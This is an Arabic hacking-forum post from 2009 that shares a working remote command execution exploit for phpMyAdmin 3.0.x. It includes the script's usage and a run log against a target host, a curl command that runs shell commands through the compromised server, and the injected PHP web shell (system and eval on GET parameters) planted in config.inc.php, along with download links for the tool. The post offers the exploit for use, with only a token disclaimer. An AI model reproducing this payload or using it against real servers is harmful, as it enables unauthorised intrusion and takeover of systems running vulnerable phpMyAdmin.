Spiral | 06-26-2009 09:32 AM | phpMyAdmin ريموت كومند !! PoC 1 مرفق الســـــلام عليكم شباب ... http://farm4.static.flickr.com/3287/...ecc214.jpg?v=0
ظهرت ثغره قوية البارحة للPhpMyAdmin بلميل وورم مع انه صعب وجود اي ثغره فعاله كPoC/exploit لبرنامج مفتوح المصدر وشهير جدا ك PhpMyAdmin .
والجميل بلثغره انه مازالت امكانية وجود ثغرات ريموت كومند ( remote command execution ) او هيب اوفر فلو ( heap overflow ) او حتى سيكيول انجكشن ك ( xp_cmdshell - cmd - etc ) .
وطبعا حصريا لشباب منتدى سيكيورتي رولز وصلني البارحة من صديق عزيز ريموت كومند للثغره بحيث نقدر من خلال الشل كود هذا نقوم بإختراق السيرفر ( نبرء ذمتي وذمة الشباب من اي عملية اختراق عربية ) كود PHP: ./SEC-R1Z_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __ / /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ / \_ _ _ _/ /_ _ / / __ | () / | | / / \_ _ _ _/ /_ _ / / |__|| / | | / / _ _ _ _\ \_ _ \ \2_0_0_9 | \ | | / /_ _ /_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ ./J0_ _\_
[b0x@r1z ~]./phpMyAdmin-sec-r1z.sh usage: ./phpMyAdmin-sec-r1z.sh i.e.: ./phpMyAdmin-sec-r1z.sh http://target.tld/phpMyAdmin/
[b0x@r1z ~]./phpMyAdmin-sec-r1z.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/ [+] checking if phpMyAdmin exists on URL provided ... [+] phpMyAdmin ****** and form token received successfully. Good! [+] attempting to inject phpinfo() ... [+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdmin-sec-r1z.sh.9217.phpinfo.r1z.html [+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.: http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/ http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo(); please send any feedback/improvements for this script to unknown.pentestergmail.com
[b0x@r1z ~]curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/" total 96 drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin drwxr-xr-x 3 root root 4096 May 6 10:01 boot drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc drwxr-xr-x 3 root root 4096 Oct 18 2008 home drwxr-xr-x 2 root root 4096 Jul 2 2008 r1z
طبعا السكربت مو برمجتي وماله علاقه بمنتدانا ! فقط للتنويه
اللحين بعد تشغيل السكربت لل تم حقن الايفل كود حقنا ( السورس كود ) كود PHP: <?php /* * Generated configuration file * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com> * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $ * Date: Tue, 09 Jun 2009 14:13:34 GMT */
/* Servers configuration */ $i = 0;
/* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
?> باسوورد الباش سكربت www.sec-r1z.com http://www.youtube.com/watch?v=-t5xWuCYhlw
رابط الفيديو مضغوط اول شي rar ومن ثم zip لاجل حجمه بلتحميل ... كود PHP: http://rapidshare.com/files/243217562/_sec-r1z.com.zip
تحياتي . يرجى ذكر المصدر عند النقل
SecurityRules www.sec-r1z.com منقووول |